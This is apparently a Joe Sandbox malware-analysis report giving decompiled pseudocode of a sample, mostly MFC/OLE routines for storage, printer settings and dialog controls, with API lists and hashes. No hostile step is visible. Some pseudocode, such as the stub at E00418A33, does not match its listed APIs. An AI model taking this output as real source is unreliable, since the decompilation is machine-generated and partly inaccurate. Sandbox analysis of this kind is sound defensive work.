                                                      									 *(_t224 - 4) = 0;
                                                      									E0041D04F(_t224 - 0x2c, _t224 - 0x74);
                                                      									_t158 =  *(_t224 + 8);
                                                      									_t159 =  *((intOrPtr*)( *_t158 + 0x14))(_t158, _t224 - 0x2c, _t222, 1, 0x1000, 0);
                                                      									_t47 = _t224 - 4;
                                                      									 *_t47 =  *(_t224 - 4) | 0xffffffff;
                                                      									__eflags =  *_t47;
                                                      									 *(_t224 - 0x10) = _t159;
                                                      									E00411738(0, _t224 - 0x74, _t224 - 0x2c, _t219, _t222,  *_t47);
                                                      								} else {
                                                      									_t161 =  *(_t224 + 8);
                                                      									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t161 + 0x20))(_t161);
                                                      								}
                                                      								_t129 =  *(_t224 + 8);
                                                      								goto L38;
                                                      							}
                                                      						}
                                                      						if( *(_t224 + 0x10) != 0) {
                                                      							goto L16;
                                                      						}
                                                      						_t163 =  *_t219;
                                                      						_push(_t224 + 0x14);
                                                      						_push(0x4394b0);
                                                      						_push(_t163);
                                                      						if( *((intOrPtr*)( *_t163))() < 0) {
                                                      							goto L11;
                                                      						}
                                                      						_push(0);
                                                      						_push(0);
                                                      						_push(0);
                                                      						_push(3);
                                                      						if( *((intOrPtr*)( *_t222 + 0x50))() == 0) {
                                                      							goto L11;
                                                      						} else {
                                                      							 *(_t224 + 0x10) = 0;
                                                      							_t168 =  *((intOrPtr*)( *_t222 + 0x50))(0, 0xffffffff, _t224 + 0x10, _t224 + 0xc);
                                                      							_t206 =  *((intOrPtr*)(_t224 + 0x14));
                                                      							 *(_t224 - 0x10) =  *((intOrPtr*)( *_t206 + 0x14))(_t206,  *(_t224 + 0x10), _t168);
                                                      							_t170 =  *((intOrPtr*)(_t224 + 0x14));
                                                      							 *((intOrPtr*)( *_t170 + 8))(_t170);
                                                      							 *((intOrPtr*)(_t224 + 0x14)) = 0;
                                                      							goto L39;
                                                      						}
                                                      					}
                                                      					_t172 =  *_t219;
                                                      					 *((intOrPtr*)( *_t172 + 0x58))(_t172, 1, _t221 + 0x70);
                                                      					if(( *(_t221 + 0x70) & 0x00020000) == 0) {
                                                      						goto L5;
                                                      					}
                                                      					_t174 =  *_t219;
                                                      					_t175 =  *((intOrPtr*)( *_t174 + 0xc))(_t174, _t221 + 0xc8);
                                                      					 *(_t224 - 0x10) = _t175;
                                                      					if(_t175 < 0) {
                                                      						goto L44;
                                                      					}
                                                      					goto L5;
                                                      				}
                                                      				_t122 = E00412F6B(_t114, __ecx,  *(_t224 + 8), 0, 3, 0x439390, _t219,  *((intOrPtr*)(_t224 + 0x14)));
                                                      				 *(_t224 - 0x10) = _t122;
                                                      				if(_t122 < 0) {
                                                      					goto L52;
                                                      				}
                                                      				goto L2;
                                                      			}

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 004148B3
                                                        • Part of subcall function 00412F6B: SysStringLen.OLEAUT32(?), ref: 00412F73
                                                        • Part of subcall function 00412F6B: CoGetClassObject.OLE32(?,?,00000000,004393D0,?), ref: 00412F91
                                                      • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 00414A3D
                                                      • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 00414A5E
                                                      • GlobalAlloc.KERNEL32(00000000,00000000), ref: 00414AAB
                                                      • GlobalLock.KERNEL32 ref: 00414AB9
                                                      • GlobalUnlock.KERNEL32(?), ref: 00414AD1
                                                      • CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 00414AF4
                                                      • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 00414B10
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
                                                      • String ID:
                                                      • API String ID: 317715441-0
                                                      • Opcode ID: f13fa0fecad93a40aca0f4cab5c0fbf99db1ea20b7f5c39c287bbb21db593fda
                                                      • Instruction ID: 234c5863126d79d24c7a543b411d71e2f8900e6cec6980265dfd09f5a00c5f11
                                                      • Opcode Fuzzy Hash: f13fa0fecad93a40aca0f4cab5c0fbf99db1ea20b7f5c39c287bbb21db593fda
                                                      • Instruction Fuzzy Hash: 09C1ECB090020A9FCB10DFA5C884AEEB7B9FF88345B10456EF515EB290D775ED91CB54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetLastError.KERNEL32(0000007F), ref: 022E14DB
                                                      • SetLastError.KERNEL32(0000007F), ref: 022E1507
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.615064004.00000000022E1000.00000020.00000001.sdmp, Offset: 022E1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_22e1000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID:
                                                      • API String ID: 1452528299-0
                                                      • Opcode ID: b392eaa855e2556c3c299e74ddc0260ac1cce0548f56da6eebaba5528958dc5d
                                                      • Instruction ID: 9e0e9b689e5a90d71041b214f57fdeb8b76b0fa44c0bc561b64cdff83f3bc898
                                                      • Opcode Fuzzy Hash: b392eaa855e2556c3c299e74ddc0260ac1cce0548f56da6eebaba5528958dc5d
                                                      • Instruction Fuzzy Hash: 0B71C2B4E20109EFCB08DF94C594AADB7B2FF48304F6485A8D41AAB345D774AE91DB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 93%
                                                      			E00403DEB(void* __ecx, char* _a4) {
                                                      				void* _v8;
                                                      				void* _t15;
                                                      				void* _t20;
                                                      				void* _t35;
                                                      
                                                      				_push(__ecx);
                                                      				_t35 = __ecx;
                                                      				_t15 =  *(__ecx + 0x74);
                                                      				if(_t15 != 0) {
                                                      					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
                                                      					if(_t15 == 0) {
                                                      						_t15 = OpenPrinterA(_a4,  &_v8, 0);
                                                      						if(_t15 != 0) {
                                                      							_t18 =  *(_t35 + 0x70);
                                                      							if( *(_t35 + 0x70) != 0) {
                                                      								E0040F775(_t18);
                                                      							}
                                                      							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
                                                      							 *(_t35 + 0x70) = _t20;
                                                      							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
                                                      								E0040F775( *(_t35 + 0x70));
                                                      								 *(_t35 + 0x70) = 0;
                                                      							}
                                                      							_t15 = ClosePrinter(_v8);
                                                      						}
                                                      					}
                                                      				}
                                                      				return _t15;
                                                      			}








                                                      APIs
                                                      • GlobalLock.KERNEL32 ref: 00403E08
                                                      • lstrcmpA.KERNEL32(?,?), ref: 00403E14
                                                      • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 00403E26
                                                      • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00403E46
                                                      • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00403E4E
                                                      • GlobalLock.KERNEL32 ref: 00403E58
                                                      • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 00403E65
                                                      • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 00403E7D
                                                        • Part of subcall function 0040F775: GlobalFlags.KERNEL32(?), ref: 0040F780
                                                        • Part of subcall function 0040F775: GlobalUnlock.KERNEL32(?,?,?,00403BCA,?,00000004,004011AF), ref: 0040F792
                                                        • Part of subcall function 0040F775: GlobalFree.KERNEL32 ref: 0040F79D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                      • String ID:
                                                      • API String ID: 168474834-0
                                                      • Opcode ID: deb0bda6af114da4f7ded021d2b5c250483e039ecf8471d16094a6eb54607884
                                                      • Instruction ID: ac421361bb6fd67369ebe5b5881472c41486625af2fb4b5e452b01b71c6537f7
                                                      • Opcode Fuzzy Hash: deb0bda6af114da4f7ded021d2b5c250483e039ecf8471d16094a6eb54607884
                                                      • Instruction Fuzzy Hash: 52119171500604BBDB216FB6DC49DAF7AACFB88744B00056EFA05E2561D779DA00D768
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 62%
                                                      			E00407270(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                      				void* __ebp;
                                                      				signed int _t133;
                                                      				intOrPtr* _t140;
                                                      				int _t145;
                                                      				signed short _t148;
                                                      				short* _t149;
                                                      				intOrPtr _t152;
                                                      				signed short _t177;
                                                      				intOrPtr _t178;
                                                      				signed int _t179;
                                                      				intOrPtr _t184;
                                                      				struct tagRECT _t189;
                                                      				int _t190;
                                                      				void* _t191;
                                                      				signed short _t193;
                                                      				signed short _t194;
                                                      				void* _t195;
                                                      				void* _t221;
                                                      				intOrPtr _t225;
                                                      				short _t226;
                                                      				intOrPtr* _t233;
                                                      				void* _t234;
                                                      				signed short* _t236;
                                                      				signed int _t240;
                                                      				void* _t241;
                                                      				signed short* _t242;
                                                      				signed short* _t244;
                                                      				signed short* _t245;
                                                      				signed int _t246;
                                                      				void* _t248;
                                                      
                                                      				_t246 = _t248 - 0x44;
                                                      				_t133 =  *0x443590; // 0x8ffedb05
                                                      				 *(_t246 + 0x48) = _t133 ^ _t246;
                                                      				_push(0x50);
                                                      				E0041F6EA(E00431F26, __ebx, __edi, __esi);
                                                      				_t233 =  *((intOrPtr*)(_t246 + 0x60));
                                                      				_t236 =  *(_t246 + 0x68);
                                                      				 *((intOrPtr*)(_t246 + 0x1c)) =  *((intOrPtr*)(_t246 + 0x54));
                                                      				 *(_t246 + 8) =  *(_t246 + 0x58);
                                                      				 *((intOrPtr*)(_t246 + 0x14)) =  *((intOrPtr*)(_t246 + 0x70));
                                                      				_t140 = _t233 + 0x12;
                                                      				 *((intOrPtr*)(_t246 + 0x2c)) = _t140;
                                                      				if( *((intOrPtr*)(_t246 + 0x5c)) != 0) {
                                                      					 *((intOrPtr*)(_t246 - 0x20)) =  *((intOrPtr*)(_t233 + 8));
                                                      					 *((intOrPtr*)(_t246 - 0x1c)) =  *((intOrPtr*)(_t233 + 4));
                                                      					 *((short*)(_t246 - 0x18)) =  *((intOrPtr*)(_t233 + 0xc));
                                                      					 *((short*)(_t246 - 0x16)) =  *((intOrPtr*)(_t233 + 0xe));
                                                      					 *((short*)(_t246 - 0x12)) =  *_t140;
                                                      					_t225 = _t233 + 0x18;
                                                      					 *((short*)(_t246 - 0x14)) =  *(_t233 + 0x10);
                                                      					 *((short*)(_t246 - 0x10)) =  *((intOrPtr*)(_t233 + 0x14));
                                                      					_t233 = _t246 - 0x20;
                                                      					 *((intOrPtr*)(_t246 + 0x2c)) = _t225;
                                                      				}
                                                      				_t226 =  *((short*)(_t233 + 0xa));
                                                      				_t189 =  *((short*)(_t233 + 8));
                                                      				 *((intOrPtr*)(_t246 - 0x24)) =  *((short*)(_t233 + 0xe)) + _t226;
                                                      				 *(_t246 - 0x30) = _t189;
                                                      				 *((intOrPtr*)(_t246 - 0x2c)) = _t226;
                                                      				 *((intOrPtr*)(_t246 - 0x28)) =  *((short*)(_t233 + 0xc)) + _t189;
                                                      				_t145 = MapDialogRect( *( *((intOrPtr*)(_t246 + 0x1c)) + 0x20), _t246 - 0x30);
                                                      				 *(_t246 + 0x24) =  *(_t246 + 0x24) & 0x00000000;
                                                      				if( *((intOrPtr*)(_t246 + 0x6c)) >= 4) {
                                                      					_t194 =  *_t236;
                                                      					 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - 4;
                                                      					_t236 =  &(_t236[2]);
                                                      					if(_t194 > 0) {
                                                      						__imp__#4(_t236, _t194);
                                                      						_t195 = _t194 + _t194;
                                                      						_t236 = _t236 + _t195;
                                                      						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t195;
                                                      						 *(_t246 + 0x24) = _t145;
                                                      					}
                                                      				}
                                                      				 *(_t246 + 0x20) =  *(_t246 + 0x20) & 0x00000000;
                                                      				E0040320E(_t246 + 0x28, E0040EA5E());
                                                      				 *((intOrPtr*)(_t246 - 4)) = 0;
                                                      				 *(_t246 + 0xc) = 0;
                                                      				 *(_t246 + 0x10) = 0;
                                                      				 *(_t246 + 0x18) = 0;
                                                      				if( *((short*)(_t246 + 0x64)) == 0x37a ||  *((short*)(_t246 + 0x64)) == 0x37b) {
                                                      					_t148 =  *_t236;
                                                      					_t57 = _t148 - 0xc; // -12
                                                      					_t226 = _t57;
                                                      					_t236 =  &(_t236[6]);
                                                      					 *_t246 = _t148;
                                                      					 *((intOrPtr*)(_t246 + 0x30)) = _t226;
                                                      					if(_t226 <= 0) {
                                                      						L16:
                                                      						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t148;
                                                      						 *((intOrPtr*)(_t246 + 0x64)) =  *((intOrPtr*)(_t246 + 0x64)) + 0xfffc;
                                                      						goto L17;
                                                      					} else {
                                                      						goto L8;
                                                      					}
                                                      					do {
                                                      						L8:
                                                      						_t177 =  *_t236;
                                                      						 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) - 6;
                                                      						_t242 =  &(_t236[2]);
                                                      						_t193 =  *_t242 & 0x0000ffff;
                                                      						_t236 =  &(_t242[1]);
                                                      						 *(_t246 + 4) = _t177;
                                                      						if(_t177 != 0x80010001) {
                                                      							_t178 = E00402EE1(__eflags, 0x1c);
                                                      							 *((intOrPtr*)(_t246 - 0x34)) = _t178;
                                                      							__eflags = _t178;
                                                      							 *((char*)(_t246 - 4)) = 1;
                                                      							if(_t178 == 0) {
                                                      								_t179 = 0;
                                                      								__eflags = 0;
                                                      							} else {
                                                      								_t179 = E00413E1A(_t178,  *(_t246 + 0x20),  *(_t246 + 4), _t193);
                                                      							}
                                                      							 *((char*)(_t246 - 4)) = 0;
                                                      							 *(_t246 + 0x20) = _t179;
                                                      						} else {
                                                      							_t244 =  &(_t236[2]);
                                                      							 *(_t246 + 0x10) =  *_t236;
                                                      							_t245 =  &(_t244[6]);
                                                      							 *(_t246 + 0x18) =  *_t244;
                                                      							E00403507(_t246 + 0x28, _t245);
                                                      							_t184 =  *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x28)) - 0xc));
                                                      							_t221 = 0xffffffef;
                                                      							 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) + _t221 - _t184;
                                                      							_t236 = _t245 + _t184 + 1;
                                                      							 *(_t246 + 0xc) = _t193 & 0x0000ffff;
                                                      						}
                                                      					} while ( *((intOrPtr*)(_t246 + 0x30)) > 0);
                                                      					_t148 =  *_t246;
                                                      					goto L16;
                                                      				} else {
                                                      					L17:
                                                      					_t149 =  *((intOrPtr*)(_t246 + 0x2c));
                                                      					_t263 =  *_t149 - 0x7b;
                                                      					_push(_t246 + 0x38);
                                                      					_push(_t149);
                                                      					if( *_t149 != 0x7b) {
                                                      						__imp__CLSIDFromProgID();
                                                      					} else {
                                                      						__imp__CLSIDFromString();
                                                      					}
                                                      					_t190 = 0;
                                                      					_push(0);
                                                      					_push( *((intOrPtr*)(_t246 + 0x6c)));
                                                      					_push(_t236);
                                                      					 *((intOrPtr*)(_t246 + 0x2c)) = _t149;
                                                      					E004199DF(0, _t246 - 0x5c, _t233, _t236, _t263);
                                                      					 *((char*)(_t246 - 4)) = 2;
                                                      					 *((intOrPtr*)(_t246 + 0x34)) = 0;
                                                      					asm("sbb esi, esi");
                                                      					_t240 =  ~( *((intOrPtr*)(_t246 + 0x64)) - 0x378) & _t246 - 0x0000005c;
                                                      					_t264 =  *((intOrPtr*)(_t246 + 0x2c));
                                                      					if( *((intOrPtr*)(_t246 + 0x2c)) >= 0) {
                                                      						_push(1);
                                                      						if(E00411CB5(0,  *((intOrPtr*)(_t246 + 0x1c)), _t233, _t240, _t264) != 0 && E00412252( *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x1c)) + 0x4c)), 0, _t246 + 0x38, 0,  *_t233, _t246 - 0x30,  *(_t233 + 0x10) & 0x0000ffff, _t240, 0 |  *((short*)(_t246 + 0x64)) == 0x00000377,  *(_t246 + 0x24), _t246 + 0x34) != 0) {
                                                      							E0041343B( *((intOrPtr*)(_t246 + 0x34)), 1);
                                                      							SetWindowPos( *( *((intOrPtr*)(_t246 + 0x34)) + 0x24),  *(_t246 + 8), 0, 0, 0, 0, 0x13);
                                                      							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x94) =  *(_t246 + 0x20);
                                                      							E004071CF( *((intOrPtr*)(_t246 + 0x34)) + 0xa4, _t246, _t246 + 0x28);
                                                      							 *((short*)( *((intOrPtr*)(_t246 + 0x34)) + 0x98)) =  *(_t246 + 0xc);
                                                      							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x9c) =  *(_t246 + 0x10);
                                                      							 *( *((intOrPtr*)(_t246 + 0x34)) + 0xa0) =  *(_t246 + 0x18);
                                                      						}
                                                      					}
                                                      					if( *(_t246 + 0x24) != _t190) {
                                                      						__imp__#6( *(_t246 + 0x24));
                                                      					}
                                                      					_t152 =  *((intOrPtr*)(_t246 + 0x34));
                                                      					if(_t152 == _t190) {
                                                      						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) = _t190;
                                                      					} else {
                                                      						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) =  *((intOrPtr*)(_t152 + 0x24));
                                                      						_t190 = 1;
                                                      					}
                                                      					 *((char*)(_t246 - 4)) = 0;
                                                      					E00419D41(_t190, _t246 - 0x5c, _t226, _t233, _t240, 1);
                                                      					E00403036( *((intOrPtr*)(_t246 + 0x28)) + 0xfffffff0, _t226);
                                                      					 *[fs:0x0] =  *((intOrPtr*)(_t246 - 0xc));
                                                      					_pop(_t234);
                                                      					_pop(_t241);
                                                      					_pop(_t191);
                                                      					return E0041E5DF(_t190, _t191,  *(_t246 + 0x48) ^ _t246, _t226, _t234, _t241);
                                                      				}
                                                      			}


































                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00407289
                                                      • MapDialogRect.USER32(?,00000000), ref: 0040731A
                                                      • SysAllocStringLen.OLEAUT32(?,?), ref: 00407339
                                                      • CLSIDFromString.OLE32(?,?,00000000), ref: 0040742B
                                                        • Part of subcall function 00402EE1: _malloc.LIBCMT ref: 00402EFB
                                                      • CLSIDFromProgID.OLE32(?,?,00000000), ref: 00407433
                                                      • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013,00000001,00000000,?,00000000,?,00000000,00000000,0000FC84,00000000), ref: 004074CD
                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040751F
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
                                                      • String ID:
                                                      • API String ID: 2841959276-0
                                                      • Opcode ID: 1308482831191b4023c7861a20e543ac11ade589bc15574cbf101fd2d2cc8799
                                                      • Instruction ID: 448c8c2dcd699e09b9d85336ea3713344f7c4e017cbfbbdeab4c9df7cebc7252
                                                      • Opcode Fuzzy Hash: 1308482831191b4023c7861a20e543ac11ade589bc15574cbf101fd2d2cc8799
                                                      • Instruction Fuzzy Hash: FBB10671904209AFDB04DF69C984AEE7BB4FF08318F00452AFC19A7391E778E994CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 37%
                                                      			E00418A33(signed int __eax) {
                                                      
                                                      				asm("lds ebp, [ecx+ecx*8-0x3e]");
                                                      				 *__eax =  *__eax | __eax;
                                                      			}



                                                      0x00418a33
                                                      0x00418a37

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00418A40
                                                      • _memset.LIBCMT ref: 00418AAC
                                                        • Part of subcall function 0041A7E4: _memset.LIBCMT ref: 0041A7EC
                                                      • VariantClear.OLEAUT32(?), ref: 00418AEC
                                                      • SysFreeString.OLEAUT32(00000000), ref: 00418B6D
                                                      • SysFreeString.OLEAUT32(00000000), ref: 00418B7C
                                                      • SysFreeString.OLEAUT32(00000000), ref: 00418B8B
                                                      • VariantClear.OLEAUT32(00000000), ref: 00418BA0
                                                        • Part of subcall function 0041A7C4: VariantCopy.OLEAUT32(?,?), ref: 0041A7D2
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: FreeStringVariant$Clear_memset$CopyH_prolog3
                                                      • String ID:
                                                      • API String ID: 883085156-0
                                                      • Opcode ID: 18a5db97fe09296ebc22d1f71aec940bc2ead0d2ae3222a38423bdfbdea22666
                                                      • Instruction ID: e5905b9386fbc3a182e4f73bdb5b86b4c3549b20c445dd11c0baad671bbe4cf2
                                                      • Opcode Fuzzy Hash: 18a5db97fe09296ebc22d1f71aec940bc2ead0d2ae3222a38423bdfbdea22666
                                                      • Instruction Fuzzy Hash: 90511DB1900209DFDB10CFA4C885BDEB7B4FF48304F14456EE515E7291DB78A985CB68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 53%
                                                      			E004157D0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                      				signed int _t59;
                                                      				signed int _t63;
                                                      				signed int _t64;
                                                      				signed int _t69;
                                                      				signed int _t70;
                                                      				signed int _t71;
                                                      				void* _t81;
                                                      				intOrPtr* _t82;
                                                      				void* _t97;
                                                      				signed int _t98;
                                                      				void* _t101;
                                                      				void* _t102;
                                                      				void* _t103;
                                                      
                                                      				_t103 = __eflags;
                                                      				_push(0x60);
                                                      				E0041F6EA(E00432F66, __ebx, __edi, __esi);
                                                      				_t97 =  *(_t101 + 8) + 0xffffff28;
                                                      				E0040DBE0(_t101 - 0x18, _t103,  *((intOrPtr*)( *(_t101 + 8) - 0xbc)));
                                                      				 *(_t101 - 4) = 0;
                                                      				if( *((intOrPtr*)(_t97 + 0x88)) != 0) {
                                                      					L19:
                                                      					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
                                                      					__eflags =  *(_t101 - 0x14);
                                                      					if( *(_t101 - 0x14) != 0) {
                                                      						_push( *((intOrPtr*)(_t101 - 0x18)));
                                                      						_push(0);
                                                      						E0040D3B7();
                                                      					}
                                                      					_t59 = 0;
                                                      					__eflags = 0;
                                                      					L22:
                                                      					return E0041F7C2(_t59);
                                                      				}
                                                      				if( *((intOrPtr*)(_t97 + 0x90)) != 0) {
                                                      					L6:
                                                      					__eflags =  *((intOrPtr*)(_t97 + 0x9c)) -  *(_t101 + 0xc);
                                                      					if( *((intOrPtr*)(_t97 + 0x9c)) !=  *(_t101 + 0xc)) {
                                                      						goto L19;
                                                      					}
                                                      					_t81 = _t97 + 0xac;
                                                      					__imp__#9(_t81);
                                                      					_t63 =  *(_t97 + 0x50);
                                                      					__eflags = _t63;
                                                      					_t85 = 0 | __eflags != 0x00000000;
                                                      					 *(_t101 + 8) = 0;
                                                      					__eflags = __eflags != 0;
                                                      					if(__eflags != 0) {
                                                      						L9:
                                                      						_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x4393c0, _t101 + 8);
                                                      						__eflags = _t64;
                                                      						if(_t64 < 0) {
                                                      							goto L19;
                                                      						}
                                                      						E0041F330(_t97, _t101 - 0x48, 0, 0x20);
                                                      						E0041F330(_t97, _t101 - 0x28, 0, 0x10);
                                                      						_t69 =  *(_t101 + 8);
                                                      						_t102 = _t102 + 0x18;
                                                      						__eflags = _t69;
                                                      						_t85 = 0 | __eflags != 0x00000000;
                                                      						__eflags = __eflags != 0;
                                                      						if(__eflags == 0) {
                                                      							goto L8;
                                                      						}
                                                      						_t70 =  *((intOrPtr*)( *_t69 + 0x18))(_t69,  *(_t101 + 0xc), 0x439340, 0, 2, _t101 - 0x28, _t81, _t101 - 0x48, _t101 - 0x10);
                                                      						__eflags =  *(_t101 - 0x44);
                                                      						_t82 = __imp__#6;
                                                      						 *(_t101 + 0xc) = _t70;
                                                      						if( *(_t101 - 0x44) != 0) {
                                                      							 *_t82( *(_t101 - 0x44));
                                                      						}
                                                      						__eflags =  *(_t101 - 0x40);
                                                      						if( *(_t101 - 0x40) != 0) {
                                                      							 *_t82( *(_t101 - 0x40));
                                                      						}
                                                      						__eflags =  *(_t101 - 0x3c);
                                                      						if( *(_t101 - 0x3c) != 0) {
                                                      							 *_t82( *(_t101 - 0x3c));
                                                      						}
                                                      						_t71 =  *(_t101 + 8);
                                                      						 *((intOrPtr*)( *_t71 + 8))(_t71);
                                                      						__eflags =  *(_t101 + 0xc);
                                                      						if( *(_t101 + 0xc) >= 0) {
                                                      							 *((intOrPtr*)(_t97 + 0xa8)) = 1;
                                                      						}
                                                      						goto L19;
                                                      					}
                                                      					L8:
                                                      					_t63 = E004037E3(_t81, _t85, _t97, 0, __eflags);
                                                      					goto L9;
                                                      				}
                                                      				 *(_t101 - 0x68) =  *(_t101 + 0xc);
                                                      				 *((intOrPtr*)(_t101 - 0x6c)) = 2;
                                                      				 *((intOrPtr*)(_t101 - 0x64)) = 0;
                                                      				 *((intOrPtr*)(_t101 - 0x60)) = 0;
                                                      				 *((intOrPtr*)(_t101 - 0x5c)) = 0;
                                                      				 *((intOrPtr*)(_t101 - 0x54)) = 0;
                                                      				 *((intOrPtr*)(_t101 - 0x50)) = 0;
                                                      				 *((intOrPtr*)(_t101 - 0x4c)) = 0;
                                                      				E00413514(_t97, _t101 - 0x6c);
                                                      				if( *((intOrPtr*)(_t101 - 0x54)) == 0) {
                                                      					goto L6;
                                                      				}
                                                      				 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
                                                      				_t98 =  *((intOrPtr*)(_t101 - 0x54));
                                                      				if( *(_t101 - 0x14) != 0) {
                                                      					_push( *((intOrPtr*)(_t101 - 0x18)));
                                                      					_push(0);
                                                      					E0040D3B7();
                                                      				}
                                                      				_t59 = _t98;
                                                      				goto L22;
                                                      			}

















                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: FreeString$_memset$ClearH_prolog3Variant
                                                      • String ID:
                                                      • API String ID: 3574576181-0
                                                      • Opcode ID: b84e5eaf672f1bfb1190bcd0de862ae4c3f2647a4bdaa930b90debcdc623c7f8
